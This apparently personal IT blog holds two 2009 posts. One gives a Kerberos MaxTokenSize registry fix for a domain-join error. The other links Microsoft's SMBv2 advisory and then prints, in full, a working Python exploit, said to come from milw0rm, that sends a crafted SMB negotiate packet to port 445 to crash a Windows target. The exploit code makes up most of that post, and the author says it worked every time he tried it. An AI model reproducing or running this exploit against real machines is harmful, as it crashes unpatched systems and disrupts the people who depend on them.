Nov/090
Microsoft Kerberos Awesomeness!
So anybody that has worked on a large domain has probably run into this issue before.
When joining a machine to a windows domain, there is the possibility that the following error can occur:
Not enough storage is available to complete this operation.
Now now...I know what you may be thinking. "I have a 500Gb hard drive, what the hell is this talking about?" Unfortunately, it is not referring to the space on your machine, or the space on the server for that matter. This error message is referring to the amount of tokens or "group memberships" exceeds the default max bytes of data to be included in a kerberos packet. This size can vary depending on the operating system, but there is a way to fix this problem. Adding the following registry key will force the maximum size of the data to be set very large so we don't have this problem.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters]
"MaxTokenSize"=dword:0000ffff
In decimal, that value is 65,535 if you would like to do it that way. Once you set this value, restart your machine and you should be all set. No more errors.
Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you that do not know what I'm talking about, by using a specially created packet an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time..sorry Chaim.
Below is the code that I have been using to to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()